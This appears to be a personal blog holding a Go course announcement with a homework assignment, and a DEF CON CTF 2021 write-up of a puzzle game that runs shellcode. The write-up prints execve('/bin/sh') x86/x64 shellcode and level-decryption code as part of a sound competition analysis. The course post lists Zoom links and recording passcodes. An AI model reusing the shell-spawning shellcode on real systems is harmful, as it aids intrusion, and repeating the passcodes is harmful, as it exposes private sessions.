Hanbang Wang

Introduction to Go

2022-01-09T15:05:00-05:00

Go 101

Both of my TA’ing classes, CIS 521 and CIS 380, are not offered this semester. So to spend the time elsewhere, I’m going to offer a whole new, experimental zero credit course: Go 101: Introduction to Go.

The class will focus on Go syntax, some simple data structures, and Goroutine usage. If we have time, some real-world applications, like OS or network programming, might be introduced as well.

The class is suitable for anyone who’s interested in Computer Science and Software Engineering, even for people with no prior knowledge in coding. I will try to make the class as approachable as possible. However, if you are interested in learning a language so that you could use an existing framework or tools, like stats, AI, big data, quant, etc., this class might not be ideal for you.

This course is NOT affiliated with Penn. You get absolutely no course credit or any certification whatsoever. This class, in turn, is absolutely free of charge and all course materials will be released into public domain.

I will still assign homework, and it will be graded. I may also give out tests/quizzes/exams. These assignments will not have deadlines.

I plan to hold Office Hours if there are many students and demand is high. Otherwise, email or Piazza should suffice.

Resource

Piazza: https://piazza.com/upenn/spring2022/go101
Gradescope: Entry Code WYREYW
Go website: The Go Programming Language
Go 101 (Textbook): https://go101.org/article/101.html

Let me know via Email if you are not a Penn student but still want to access the quiz.

Schedule

The meeting time is weekly on Thursday 7 PM to 8:30 PM Eastern Time, from January 13th to April 21st, so 15 meetings in total. This is so far tentative.

Meeting is held remotely via Zoom: https://upenn.zoom.us/j/93107977009?pwd=ZnFIR0M3VHdWbG1VOS9remJONFJ2UT09. Class will be recorded.

Slides may or may not be made, depending on the content.

Jan 13

Topic

Class intro
Programming language intro (and why Go)
Binary data and memory intro
Primitive data types in Go

Homework

A quiz is released on Gradescope.

Recording

https://upenn.zoom.us/rec/share/2Zo7h1x8wjBLc0T076D9qAktdORwy2HBi47cW0GDP0vx5yarPxjdzb9pilupCb-_.5AI9jICXkrAZArfN Passcode: 2*+R2EFB

Jan 20

Topic

Packages and function intro
Variables intro
Primitive literals
- Integer
- Floating-point
- Complex
- Boolean
- String

Basic Types and Basic Value Literals - Go 101

Homework

A quiz is released on Gradescope.

Recording

https://upenn.zoom.us/rec/share/CwUbPM2_T1sbMhVBAY_vGwysJMd234extmseDMVD64romoRXQ93lKK-hKah71yYx.1-kwbZNHCoTtvOMs Passcode: Dg8!dHA5

Jan 27

Topic

Basic Operators
Variables (continued) and Constants
Type conversion
~~Scope~~

Homework

A quiz is released on Gradescope.

Recording

https://upenn.zoom.us/rec/share/WbADhx89M5ynkIG0o7XEaIzWXMBzuZwNXjlOXLmrOLwaSMAV67qlZ5yeCd62Pr6i.4hZ9JBlD_cSda3ti (Passcode: Nj@T5!x^)

Feb 3

Topic

Scope
Intro to functions
Package and Import
Array
Write and compile code demo

Code Packages and Package Imports - Go 101
Function Declarations and Function Calls - Go 101 (only relevant part)
Arrays, Slices and Maps in Go - Go 101 (only relevant part)

Recording

https://upenn.zoom.us/rec/share/Pb3fBvqMnUu6887REkODH1OKu8kWRfNg4HlEPrfrWzCKNtp8PMJ047lBs4a_Iitd.TTIQK1i6qyoEpTXK (Passcode: Hyw3b=nw)

Homework

A programming assignment is released on Gradescope.

Homework

Operators & Functions

In this first assignment, you are asked to write some functions with the given signatures, and then implement the required functionality within them.

There are five parts to the assignment. Because Go is a compiled language and this homework tests your ability to write functions, you have to finish (almost) the entire homework before your code compiles. The autograder will then test whether the implemented functions have the correct functionality.

Before you start, please follow the instructions to install Go on your local computer (you should have it if you have finished Quiz 1). Then, follow the demo at the end of Feb 3 class, where we showed how to prepare a Go environment on your computer.

Once you have done that, create a file named main.go under your working directory. This is the file in which you will write your Go program for this homework, and only this file. After you finish the homework, you should submit ONLY this file to Gradescope.

For this homework, use package name main.

Part 1

Declare a constant at package-level of the main package, named CourseName, which has type string and value "Go 101".

Recall that a constant declaration starts with const, and that package-level is the top-level of a file (i.e. not in a code block). Also recall that identifiers are case sensitive.

Part 2

Declare a variable at package-level of the main package, named Counter, which has type uint8 and its zero-value. Recall that variable declaration starts with var.

After that, declare a function named IncCounter, which has no arguments and no return values. Each time IncCounter is called, increase Counter by one. Recall operators +, +=, or ++.

Your code should not access Counter anywhere else.

Part 3

Declare a function named BoolOperation, which takes in two bool arguments and returns four bool values.

The first return value is the logical and of the two input arguments; the second return value is the logical or of the two input arguments; the third return value is the logical not of the first input argument; the fourth return value is the logical not of the second input argument.

Recall that logical and uses the binary operator &&, logical or uses the binary operator ||, and logical not uses the unary operator !. Also recall returning values using the return keyword.

Part 4

Declare a function named IntArrayOperation, which takes in a single int array of size 4, and returns three int values.

The first return value is the sum of the first element in the array and the second element in the array; The second return value is the sum of the third element in the array and the fourth element in the array; The third return value is the product (multiplication) of the previous two return values (i.e. the product of the sum of the first and second and the sum of the third and fourth element in the argument array).

Recall operator + and *, also make sure to take care of calculation precedence. Recall the type of an array of type T with size N is [N]T. Recall that accessing the ith element of an array arr uses the indexing arr[i], and that index starts from 0.

You can assume that doing the above operations won’t cause overflows.

Part 5

Declare a function named PackFloatArray, which takes in four float64 as its argument, and returns a single float64 array of size 4.

As the name goes, the return value should be a float64 array whose stored values are the four given arguments, stored with the order they were given. More specifically, the first value in the array should be the first argument given to the function, the second value in the array should be the second argument given to the function, so on and so forth.

To return an array, return it the same way as any other values.

After implementing these five parts, you should first check whether your code compiles successfully. Note that successful compilation doesn’t mean that the program is correct, but it does mean that all the types and operations are valid.

Later we will talk about how to properly write test cases for your code. For now, we can just use main function as a way to test our program. Within the main function, write some value and then call the function with the value. Output the results using println or fmt.Println. If the output result seems correct, then you are good.

Submit main.go onto Gradescope and get a score to see how well you did!

DEF CON CTF 2021

2021-08-22T12:30:00-04:00

A week before the game, Tea Deliverers split up into four sub-teams and held an internal competition using some of the past challenges with some minor tweaks. I was the only one doing the KoH challenge in our team, and I was doing fairly okay, so I decided to be a KoH player for the finals. I was sure the challenges would keep me busy without stressing me out during the game, as there would be one and only one completely new challenge each day.

Turned out I was right. I enjoyed each and every King of the Hill challenge, and I got enough rest during the time off when it’s daytime in China, very healthy lifestyle indeed.

zero-is-you

This was a copy of the game Baba is You. What’s nice about the original game is that it’s already Turing complete, and just to add shellcode execution onto it, woah, you just opened the gate to another dimension. (insert mind-blown meme pic here)

For those without prior experience in Baba is You, the game is a Sokoban-style puzzle game, where the player can push different blocks into different places. There are some famous modern developments of this classic genre, like A Good Snowman Is Hard To Build or Stephen’s Sausage Roll. The twist with Baba is You is that the blocks themselves can be part of an instruction that tells how the game world functions. I will explain this more in the following.

I really recommend trying out Baba is You, but for a smol brain like me, I can’t finish the game without referencing a walkthrough, sad.

Extract Game Code

Within the provided package game_client.tgz, there were a few files: README, start, sync, and a build folder. README told us how the game worked. start was a shell script that simply ran the zero-is-you binary within the build folder.

For sync, since we needed to run it with python3, it had to be a Python program. It was not a text file, so it had to be compiled Python bytecode, like a .pyc. Using an existing decompiler, rocky/python-decompile3, we were able to decompile sync into Python source code. There’s nothing interesting about sync; it just uploads to and downloads from the server. As for what data it actually transmitted, we’ll get back to it in a sec.

After @riatre gave us the hint that the entire game is written in Python, as a Game Data-Mine Professional™, without playing the game first, I dove directly into extracting the game data. A quick strings on the zero-is-you ELF binary showed things like _MEIPASS2, and a quick Google search told us that this was a program packed by PyInstaller. Using an existing extractor, extremecoders-re/pyinstxtractor, we were able to extract every .pyc from the binary. Using the aforementioned decompiler, we could turn this bytecode back into .py form. Although there were some decompilation errors, we recovered most of the game in source code form.

Once we had the extracted game, my teammates could run the game on Windows and macOS without problems. We also added custom functionality to the game, such as undoing a move, which simply replayed the earlier moves. The decompiled source code also helped us figure out the format of level files and rules of the game, which I will talk about later.

Ready Player One

OOO’s internet was down, so we were not able to use sync to communicate with the server, but they kindly sent us the level1 file so that we could look into this level first.

With some prior experience with Baba is You, I immediately knew what’s going on. On the top we had two “rules,” zero is you and ice is stop. The former meant that we were currently in control of zero, and the latter meant that everything should stop in front of ice. So zero referred to the little hacker boy icon in the middle of the screen, this could be easily checked by moving zero using arrow keys; ice referred to ice blocks surrounding the middle part of the screen, and a line of ice blocks at the top.

Any such “rule,” consisting of three blocks that looked like [xxx] [is] [yyy] when read from left to right or top to bottom, would be enforced in the game world. You could make a new rule by pushing the blocks around and putting them together, or break existing rules by splitting the blocks up. The special rule [noun] is you makes the player able to control that [noun] thing on the board, just like in Baba is You.

However, the processor-looking block and the line of hex values at the top of the screen were not in Baba is You. After a further look into the source code and some trial and error with the blocks, we figured out how the entire game worked:

Shellcode Mechanism

The entire screen we saw, which was a $25 \times 15$ space of blocks, was actually the memory of the machine, meaning the address of the machine ranged from 0x0 to 0x176. The memory read from left to right, so the layout was

\[\begin{matrix} \texttt{0x00} & \texttt{0x01} &\cdots &\texttt{0x18} \\ \texttt{0x19} &\texttt{0x1a}&\cdots &\texttt{0x31} \\ \vdots & \vdots &\ddots & \vdots \\ \texttt{0x15e} &\texttt{0x15f}& \cdots & \texttt{0x176} \end{matrix}\]
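The row-major layout can be sketched as a pair of conversion helpers. The names `WIDTH`, `HEIGHT`, `addr_of`, and `cell_of` are made up for illustration and are not taken from the game's source.

```python
WIDTH, HEIGHT = 25, 15  # board size described in the text


def addr_of(row, col):
    """Memory address of the block at (row, col), counted from the top-left."""
    if not (0 <= row < HEIGHT and 0 <= col < WIDTH):
        raise ValueError("cell is outside the board")
    return row * WIDTH + col


def cell_of(addr):
    """Inverse of addr_of: the (row, col) of the block holding this address."""
    if not 0 <= addr < WIDTH * HEIGHT:
        raise ValueError("address is outside the board")
    return divmod(addr, WIDTH)


print(hex(addr_of(1, 0)))    # first block of the second row
print(hex(addr_of(14, 24)))  # bottom-right block
print(cell_of(0x15E))        # first block of the last row
```

Helpers like these make it easy to translate an address from a disassembly listing into the block you need to push the processor to.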

The hex bytes displayed on those blocks were the values at those memory addresses. If a value was zero, the block would be displayed as empty. However, you could switch the display style by pressing ` (backquote), which hid the game blocks and displayed the otherwise empty zero values.

The block that looked like a processor, which is on the top-left corner of the game, would act as a program counter (or instruction pointer) that would execute the memory, if and only if an architecture was specified (cpu is [arch] was on the board) and cpu is run was on the board at the same time. If cpu is run was on the board but no architecture was specified, a segfault would be thrown.

When cpu is run was on the board, every time the player made a move, either using arrow keys or the Space key to stay where you were, the machine would execute the instruction at the program counter (location of the processor block).

The level would be cleared when a syscall to SYS_EXECV was invoked with the argument being either /bin/sh or /bin/bash after being sanitized by os.path.abspath in Python. For example, for the x64 arch, that meant that if we could put the address of a string /bin/sh in rdi and 0x3b in al, and then invoke a syscall, we would pass the level.

Level File Decryption

The level file decryption was inside the file utils.py after unpacking and decompiling. It looked something like this:

import zlib

def load_level_data(filename):
    key = b'zero'
    with open(filename, 'rb') as f:
        data = f.read()[3:]  # skip the 3-byte header
    # Undo the repeating-key XOR, then inflate the zlib stream.
    compressed = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
    return zlib.decompress(compressed).decode('utf8')

Having figured this out, we could view the level file in its cleartext form. Level 1’s file after decryption looked like this:

Ready Player One
W wall
w _WALL
I ice
i _ICE
Z zero
s _is
t _STOP
z _ZERO
m _YOU
1 cpu
c _CPU
x _x64
b _BUG
r _RUN
B bug

1........................  90 48 83 c4 50 50 48 bb 2f 62 69 6e 2f 2f 73 68 53 54 5f b0 3b 0f 05
IIIIIIIIIIIIIIIIIIIIIIIII  
zsm...................ist
.........................
.......IIIIIIIIIII.......
.......I.........I.......
.......I....s....I.......
.......I...cxr...I.......
.......I....s....I.......
.......I.........I.......
.......I....Z....I.......
.......IIIIIIIIIII.......
.........................
.........................
.........................
.........................

The first line gives the title of the level. The following lines, up to the empty line, say what each character means in the game board representation below. Then we have a $25 \times 15$ board made out of ASCII characters, each line followed by a maximum of $25$ hex values representing the memory values on that row of the board. If a line ends in 00s, those trailing values are omitted.
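A minimal parser for this layout might look like the sketch below. It is reconstructed only from the description here, not from the game's own loader, and the function name `parse_level` and its return shape are my own choices.

```python
def parse_level(text, width=25):
    """Split a decrypted level into (title, legend, board, memory)."""
    lines = text.splitlines()
    title = lines[0]
    # The legend runs from the second line up to the first blank line.
    blank = next(i for i, line in enumerate(lines) if i > 0 and not line.strip())
    legend = {}
    for line in lines[1:blank]:
        symbol, name = line.split(maxsplit=1)
        legend[symbol] = name
    board, memory = [], []
    for line in lines[blank + 1:]:
        if not line.strip():
            continue
        board.append(line[:width].ljust(width, "."))
        values = [int(h, 16) for h in line[width:].split()]
        # Trailing 00 bytes are omitted in the file, so pad them back in.
        memory.append(values + [0] * (width - len(values)))
    return title, legend, board, memory


# Tiny made-up level with a 5-block-wide board, just to exercise the parser.
sample = "Demo\nZ zero\n1 cpu\n\n1....  90 48\n..Z..\n"
title, legend, board, memory = parse_level(sample, width=5)
print(title, legend)
print(board)
print(memory)
```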

We could build custom levels as well by reversing what the function does. We could also alter the existing levels to make testing out solutions much easier.
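Reversing the loader could look roughly like this. The decompiled code only shows that the first three bytes are skipped, so the `HEADER` value below is a placeholder assumption; if the game checks those bytes, copy them from a real level file instead. The names `encode_level` and `decode_level` are hypothetical.

```python
import zlib

KEY = b"zero"
HEADER = b"\x00\x00\x00"  # assumption: the loader skips 3 bytes without checking them


def xor_with_key(data):
    """Repeating-key XOR; applying it twice gives back the input."""
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(data))


def encode_level(text):
    """Inverse of load_level_data: compress, XOR with the key, prepend the header."""
    return HEADER + xor_with_key(zlib.compress(text.encode("utf8")))


def decode_level(blob):
    """Same steps as load_level_data, but on bytes instead of a file."""
    return zlib.decompress(xor_with_key(blob[3:])).decode("utf8")


level = "Demo\nZ zero\n\n..Z..\n"
print(decode_level(encode_level(level)) == level)
```

Writing the result of `encode_level` to a file gives something the loader shown earlier should be able to read back, under the header assumption above.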

Playing the Game

Now going back to the first level, there was only one cpu block and one arch x64 we could use, meaning we had to somehow first set cpu is x64 and then set cpu is run without breaking the first one. Recall that the rules were parsed from left to right AND from up to down. Therefore, we could put cpu at the upper-left corner, so it could be used by two rules at the same time, something like this:

\[\begin{matrix} \texttt{cpu} & \texttt{is} & \texttt{x64}\\ \texttt{is}\\ \texttt{run} \end{matrix}\]
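To see why the shared corner works, here is a simplified sketch of a rule scan that reads triples both rightwards and downwards. It is not the game's actual parser; `find_rules` and the grid representation are made up for illustration.

```python
def find_rules(grid):
    """Return every [subject] is [object] triple read left-to-right or top-to-bottom.

    `grid` is a list of rows; each cell is a text-block name or None.
    """
    rules = []
    height = len(grid)
    width = len(grid[0]) if grid else 0
    for r in range(height):
        for c in range(width):
            for dr, dc in ((0, 1), (1, 0)):  # rightwards, then downwards
                r2, c2 = r + 2 * dr, c + 2 * dc
                if r2 >= height or c2 >= width:
                    continue
                first, mid, last = grid[r][c], grid[r + dr][c + dc], grid[r2][c2]
                if first and last and mid == "is" and first != "is" and last != "is":
                    rules.append((first, last))
    return rules


board = [
    ["cpu", "is", "x64"],
    ["is", None, None],
    ["run", None, None],
]
print(find_rules(board))
```

The single cpu block is the subject of both the horizontal and the vertical triple, so both rules are active at once.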

After I did that and moved around to execute the instructions, we cleared the level. But before we go to the next level, let’s first take a look at the shellcode for the first level:

0:  90                      nop
1:  48 83 c4 50             add    rsp,0x50
5:  50                      push   rax
6:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
d:  2f 73 68
10: 53                      push   rbx
11: 54                      push   rsp
12: 5f                      pop    rdi
13: b0 3b                   mov    al,0x3b
15: 0f 05                   syscall

As we can see, this is a pretty normal shellcode that does a syscall with al being 0x3b and rdi pointing to the string /bin//sh in memory. The extra slash does not matter because it would be sanitized out by os.path.abspath in Python.
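Both claims are easy to check in a few lines. This sketch uses `posixpath` rather than `os.path` so that it behaves the same on any platform; on Linux the two are the same module.

```python
import posixpath
import struct

imm = 0x68732F2F6E69622F       # immediate loaded by movabs rbx, ...
raw = struct.pack("<Q", imm)    # x64 is little-endian, so this is the byte order in memory
path = raw.decode("ascii")

print(path)                     # the string that ends up on the stack
print(posixpath.abspath(path))  # the same path after normalization
```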

Flatline

This time we had an x86 machine, and a quick disassembly told us:

0:  83 c4 20                add    esp,0x20
3:  50                      push   eax
4:  68 2f 2f 73 68          push   0x68732f2f
9:  68 2f 62 69 6e          push   0x6e69622f
e:  89 e3                   mov    ebx,esp
10: 89 c1                   mov    ecx,eax
12: 89 c2                   mov    edx,eax
14: b0 0b                   mov    al,0xb
16: cd 80                   int    0x80

We had a completely valid shellcode here already, so the only thing we needed to do was to run cpu. The only cpu is run was at the left side of the game board, so we had to get there. However, we were surrounded by a wall of virus blocks, and virus had two rules enforced on it at the start of the game: virus is stop and virus is kill. We could only disable virus is stop by pushing away any of the blocks in that rule, but after that, when we tried to step onto a virus block, we would be killed immediately with a “game over” screen.

It seemed impossible to disable the rule without leaving the “virus jail,” but we had to leave the jail first to move the block away, so it’s a paradox! However, this was just another famous trick in Baba is You, where you realize that the “kill” command only applies to the player but not other things in the game world, so other blocks can move freely through the virus block, assuming virus is stop is not in effect.

The solution then is something like this:

You first line up the blocks at the bottom horizontally, then push them from the right so that the blocks push each other and extend out until they reach virus is stop and split that rule. After that, our Zero can walk through the virus blocks and push together cpu is run to finish the game. This strategy came in handy in the later part of the game as well.

ICE Crash

For this level, we had cpu is x64 and cpu is run already in effect. However, if we just wandered around and let the program execute, the processor would move to the next line and hit the ice, resulting in a segfault, because ice is stop was also in effect.

Let’s then look at this level’s shellcode

0:  48 83 c4 18             add    rsp,0x18
...
c:  50                      push   rax
...
19: 48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
20: 2f 73 68
23: 53                      push   rbx
24: 54                      push   rsp
25: 5f                      pop    rdi
...
32: b0 3b                   mov    al,0x3b
34: 0f 05                   syscall

The zeros were hidden since 00 00 was very similar to nop in our case. This was a normal shellcode, and if we could execute the entirety of it, we could pass this level. Therefore, we had to somehow make the processor execute the program without being stopped.

It looked like there were two ice is stop on the board right now, so we could just break them up and that should solve the problem, right? A few tries told us that we just didn’t have enough time to break the blocks up before the processor reached an ice block.

Notice that for all the levels before, we had most of the rules formed in a way that looks like [noun] is [verb], but it’s possible to turn something into something else by setting up a rule as [noun] is [noun]. Looking at the board, we had zero is you exposed to the player. That meant it was possible to form ice is zero or ice is you in the game.

In fact, both solutions work: ice is zero would turn the ice into a bunch of Zero so the processor would not be stopped since the ice blocks are gone. And ice is you would make the player be able to control the ice so we could move the ice blocks out of the way.

High-speed Pizza Delivery

Here we had cpu is x64 and ice is stop at the bottom of the screen where we were unable to reach. And we had a bunch of new blocks that looked like different registers. Ignoring that first and putting cpu is run together, we could see the processor reached the end of the shellcode and then a segfault was thrown. Let’s take a look at the shellcode then:

0:  90                      nop
1:  90                      nop
2:  48 83 c4 50             add    rsp,0x50
6:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
d:  2f 73 68
10: 50                      push   rax
11: 53                      push   rbx
12: 54                      push   rsp
13: 58                      pop    rax
14: b0 3b                   mov    al,0x3b
16: 0f 05                   syscall

Huh, everything looked normal, though with a closer look, we could see that the address of the string was stored at rax instead of the supposed rdi register. Then, combined with the newly appeared blocks that had register names on them, it came to us that we needed to make rax is rdi so that when the machine was executing pop rax, it was actually executing pop rdi.

However, if we first formed rax is rdi and let the program run, we still would get a segfault. Then we tried a lot of things, like using rdi is rax instead. One of my teammates finally realized that we might only want the rule to be in effect when we were executing that single instruction pop rax, so he pushed cpu is run vertically, let it run to address 0x13, stopped the run by splitting the blocks, went to the right part and formed rdi is rax, came back and continued the run for 1 tick, and then disabled that rule, came back to run the last syscall, and finally we got it working.

Ten Thousands Steps

Well, the title said ten thousands steps, but if you actually used more than 1000 steps, you would get a screen saying you have run out of time.

We were again locked up in a jail, made out of ice blocks this time. However, there was a lock block and lock is push inside the jail, so we could simply push from left to right to enable that rule and walk out of the jail. However, if we just went straight to cpu is run, the processor would inevitably stumble onto an ice block and stop running (throwing a segfault).

With a closer look at the existing shellcode on the board, I realized we actually had every instruction we needed on the board, but they were just scattered around the memory. Looking at what we had on the board, I came up with a solution:

Enable lock is push to escape the jail.
Push cpu is run all into the jail so that it can form cpu is push horizontally and cpu is run vertically at the same time. Notice that since push is at the right most edge of the board, it is impossible to push it out.
Execute the following instructions one by one, by pushing the processor block to the start of that instruction, go back into the jail to enable cpu is run, and immediately disable it so the machine will run exactly one instruction. Go back to push the processor block to the head of the next instruction we want to execute, and repeat the process.
1. 48 83 c4 2a (add rsp,0x2a) to set up the stack.
2. 48 bf 2f 62 69 6e 2f 2f 73 68 (movabs rdi,0x68732f2f6e69622f) to store the string into rdi.
3. 57 (push rdi) to push the string onto the stack.
4. 54 (push rsp) to store the string address onto the stack.
5. 5f (pop rdi) to pop the string address back into rdi.
6. 6a 3b (push 0x3b) to push the syscall number onto the stack.
7. 58 (pop rax) to pop the syscall number back into rax.
8. ……

Wait a minute, where’s the syscall instruction? Then my teammate gave me a hint: it was actually hidden under an ice block. A look at the level file confirmed that it really was hidden under the bottom line of ice cubes. This meant that we would have to change our strategy up a bit.

So my solution was, once we escaped the jail, we could push lock text block all the way down to the left-bottom side, and use the is block out there to form ice is lock so all the ice blocks will turn into lock blocks. Then, pushing the lock text block all the way back to form lock is push, so we could push away the jail wall and reveal the syscall instruction bytes. Then we could continue our plan from step 2.

Finally, we just needed to push the processor block to the revealed 0f 05 (syscall) and let the machine run one last time. It took me about 750 steps to beat this level by hand.

The Elegant Mantis

This level really juiced my brain. The two blocks with the “recycle” symbol drawn on them would flip the memory with respect to the game board when the player stepped on them. The left one would flip the memory horizontally (the center row wouldn’t change); the right one would flip vertically (the center column wouldn’t change). Therefore, we had four potential shellcodes: one original, one flipped horizontally, one flipped vertically, and one flipped diagonally.
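The four candidate memory images can be enumerated with a sketch like the one below. The function names are mine, and which flip belongs to which in-game block is my reading of the description, not something checked against the game's source.

```python
WIDTH, HEIGHT = 25, 15


def to_rows(memory):
    """Cut the flat memory into HEIGHT rows of WIDTH cells."""
    return [memory[r * WIDTH:(r + 1) * WIDTH] for r in range(HEIGHT)]


def swap_rows(memory):
    """Top row trades places with the bottom row; the center row stays put."""
    return [b for row in reversed(to_rows(memory)) for b in row]


def swap_columns(memory):
    """Leftmost column trades places with the rightmost; the center column stays put."""
    return [b for row in to_rows(memory) for b in reversed(row)]


memory = list(range(WIDTH * HEIGHT))  # dummy contents: each cell holds its own address
variants = {
    "original": memory,
    "rows swapped": swap_rows(memory),
    "columns swapped": swap_columns(memory),
    "both": swap_columns(swap_rows(memory)),
}
print(len({tuple(v) for v in variants.values()}))  # number of distinct images
```

Applying both flips is the same as reading the whole memory backwards, which is why the order of the two flips does not matter.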

I didn’t solve this level, so I will skip what I tried during the game and talk about how my teammate solved it.

Let’s first analyze the original shellcode:

0:  be 16 00 00 00          mov    esi,0x16
5:  bb 00 00 00 00          mov    ebx,0x0
a:  eb 05                   jmp    0x11
c:  01 db                   add    ebx,ebx
e:  83 c6 01                add    esi,0x1
11: 83 fe 30                cmp    esi,0x30
14: 76 f6                   jbe    0xc
16: 83 ec 90                sub    esp,0xffffff90
19: 08 53 76                or     BYTE PTR [ebx+0x76],dl
1c: f0 83 c4 12             lock add esp,0x12
20: 89 c7                   mov    edi,eax
22: 01 d8                   add    eax,ebx
24: e8 22 5a 55 90          call   0x90555a4b
29: 00 31                   add    BYTE PTR [ecx],dh
2b: c0 81 ea 18 21 4a 33    rol    BYTE PTR [ecx+0x4a2118ea],0x33
32: eb 0d                   jmp    0x41
34: 85 c0                   test   eax,eax
36: 54                      push   esp
37: 83 c4 21                add    esp,0x21
3a: 39 cb                   cmp    ebx,ecx
3c: 75 e8                   jne    0x26
3e: 5d                      pop    ebp
3f: 58                      pop    eax
40: 76 fe                   jbe    0x40
42: 01 db                   add    ebx,ebx
44: 83 ec 01                sub    esp,0x1
47: 01 fc                   add    esp,edi
49: 41                      inc    ecx
4a: 41                      inc    ecx
4b: b8 10 00 00 00          mov    eax,0x10
50: bb 2f 62 69 6e          mov    ebx,0x6e69622f
55: 89 18                   mov    DWORD PTR [eax],ebx
57: bb 2f 73 68 00          mov    ebx,0x68732f
5c: 89 58 04                mov    DWORD PTR [eax+0x4],ebx
5f: 89 c3                   mov    ebx,eax
61: 31 c9                   xor    ecx,ecx
63: 29 d2                   sub    edx,edx
65: b0 0b                   mov    al,0xb
67: cd 80                   int    0x80

If we just let this shellcode run, the machine would eventually throw a segfault at address 0x24, because the calling address was out of bounds. Taking a closer look at the end of the program, from address 0x4b to 0x67, we saw it actually set up the register and memory appropriately. That meant we could clear this level if we could let the program counter somehow reach there.

Therefore, starting from the very beginning, there were four actions we could take at every tick of the game: run the CPU, flip the memory horizontally, flip the memory vertically, or stop the CPU from running. We had a search algorithm to help us explore all the different paths to take, using Unicorn to decide whether to continue searching down a path or stop because of a segfault.

Finally, we were able to find a path through the shellcode that led to the desired instruction address mentioned above. We converted that into a list of movements in the game, and we were done with the level.
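I did not write the actual solver, so the following is only a sketch of the general shape such a search could take: a breadth-first search in which each action either yields a new state or reports a dead end. In a real solver the "run" action would single-step an emulator such as Unicorn; here a toy transition function stands in for it, and every name (`search`, `run`, `flip`) is hypothetical.

```python
from collections import deque


def search(start, actions, is_goal, max_depth=1000):
    """Breadth-first search over hashable game states.

    `actions` maps an action name to a function state -> new state,
    or None when that action ends in a segfault (a dead branch).
    """
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        state, path = queue.popleft()
        if is_goal(state):
            return path
        if len(path) >= max_depth:
            continue
        for name, apply in actions.items():
            nxt = apply(state)
            if nxt is None or nxt in seen:
                continue
            seen.add(nxt)
            queue.append((nxt, path + [name]))
    return None


# Toy stand-in for the emulator: state is (program counter, memory flipped?).
def run(state):
    pc, flipped = state
    if pc == 2:  # the instruction here only works in the flipped image
        return (5, flipped) if flipped else None
    return (pc + 1, flipped)


def flip(state):
    pc, flipped = state
    return (pc, not flipped)


print(search((0, False), {"run": run, "flip": flip}, lambda s: s[0] == 5))
```

Breadth-first order finds a shortest action sequence first, which matters when every action costs the player a tick.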

(Consensual) Hallucination

The shellcode in this level was just an infinite loop and contained no “/bin/bash” string of any sort, so we could ignore it. Looking at the board, we had bug is bash, which meant that we could pass this level if we were able to touch the bug icon at the upper-right corner of the game.

This was yet another core mechanism in Baba is You, and since this time the shellcode was not important anymore, it was truly a game level. Not much to talk about then, we played it manually and found a solution:

Utilizing lock bind disk, we can push the floppy disk to the right side of the virus wall, while keeping the lock on the left side.
Use the floppy disk as a hook to get cpu is run back to the left side of the virus wall.
Use the bind mechanism to put the floppy disk on the bug icon and make it stay there by breaking lock bind disk.
Line up disk is at the bottom in front of the virus wall, and put all the remaining blocks to the left of them.
Push from left to right so the blocks pass through the virus wall and connect the zero text block on the right hand side.

This would form a new rule disk is zero so the floppy disk block turned into Zero. Since the floppy disk was on the bug icon, the Zero was then on the bug so we successfully passed this level.

UpWind

A lot of new mechanisms in this level.

There was a new portal-like block, which corresponded to the nrg text block (although I have no idea what nrg means). If nrg is edit was in effect and the player stood on one of the portal-like blocks, a pop-up would appear and the game would allow you to input a hex value. The value would then be written into the memory at that block.

There was also a new “fan” mechanism: if fan is wind was in effect, all pushable blocks on the same row as the fan would move left by one block, if possible.

We tried a lot of things and then had some basic understandings:

We had to go to the bottom of the level and trigger cpu is run, however
It was impossible to bring the processor into the wind tunnel because it would stick at the end and not allow us to pass through it, and
It was also impossible to use the processor at the upper part of the level, because there weren’t enough portals for us to input a valid shellcode, and we couldn’t even use jmp because that required two bytes, but
there was nrg text block at the bottom of the level, so we could turn nrg into a CPU.

So our idea was to push all the portal blocks into the wind tunnel, input a shellcode using the edit function, and leave the leftmost one untouched so that we can turn it into a CPU later.

However, we ignored one of the largest problems: there’s a wind blowing in the tunnel and it would blow the CPU to the left one block each tick. Quickly, we came up with two potential solutions for this:

We write shellcode such that even if the processor was blown back by one block, it would still run without issues. That meant the ending byte of the previous instruction would be the start of the next instruction.
We write shellcode in reverse from right to left, so the wind would help us blow the CPU to the correct position. Since we could control when the CPU runs, we could execute one instruction when we saw the CPU reached a certain position, and then to stop the execution, and wait until it reaches the next instruction on the left.

The first one required some real hardcore shellcode technique, and the second one required precise timing; neither was easy to do. Therefore, we split into two teams, one trying the first solution and the other trying the second. Eventually the first team got their answer out, and I had no idea how they did it.

Code Choreography

This level was very similar to level 5 Ten Thousands Steps.

Taking a closer look at the existing shellcode on the board, we realized that we had everything except for cd 80 (int 0x80). There was cd 81 already on the board, so all we needed to do was turn that 81 into 80. The question was, how?

We disassembled the entire memory at each offset and tried to find a combination of these that may work:

We first took a look at address 0xd1, which was dec DWORD PTR [ecx+0xc1], so we thought that we have to somehow put 0x32 into ecx such that they sum up to be 0xf3, which was the memory address of that byte 81 we wanted to decrease. There were inc eax and mov ecx, eax on the board, so my teammate wrote a script that could automatically repeat the process of controlling the character to push the processor to one location, come back and execute that instruction. However, this quickly exceeded the 1000 steps limit, so we had to look for something else.

We then turned our eyes to the other dec on the board at address 0x9e. Immediately we saw mov bl, BYTE PTR [eax] and mov BYTE PTR [eax], bl around it. After more digging, we found another really interesting instruction, or eax, DWORD PTR [eax+0x40], at address 0xec. With some brute-forcing, we found that there was an instruction mov al, 0x61, and at exactly address 0xa1 (that is, 0x61 + 0x40) we had the value 0x90. ORing 0x90 with 0x61 gives 0xf1. Then all we needed to do was increment eax twice, and voilà, we had a way to decrease the value at 0xf3.

Together the chain to decrease the value looked like this:

e6:   b0 61                   mov    al, 0x61
ec:   0b 40 40                or     eax, DWORD PTR [eax+0x40]
ed:   40                      inc    eax
ee:   40                      inc    eax
9c:   8a 18                   mov    bl, BYTE PTR [eax]
9e:   4b                      dec    ebx
9f:   88 18                   mov    BYTE PTR [eax], bl

Then all that’s left to do was to build the remaining instructions.
